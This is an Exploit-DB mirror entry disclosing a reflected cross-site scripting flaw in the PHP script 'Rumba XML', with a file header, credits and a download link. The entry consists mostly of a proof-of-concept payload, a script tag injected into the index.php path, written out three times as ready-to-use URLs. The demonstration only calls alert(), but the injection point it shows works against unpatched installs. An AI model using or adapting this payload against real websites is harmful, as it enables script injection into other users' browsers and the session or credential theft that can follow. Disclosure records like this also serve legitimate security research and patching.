exploit-db-mirror/exploits/php/webapps/10534.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
618 B
Text

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#
###########################################
PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>
example :
http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>
local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>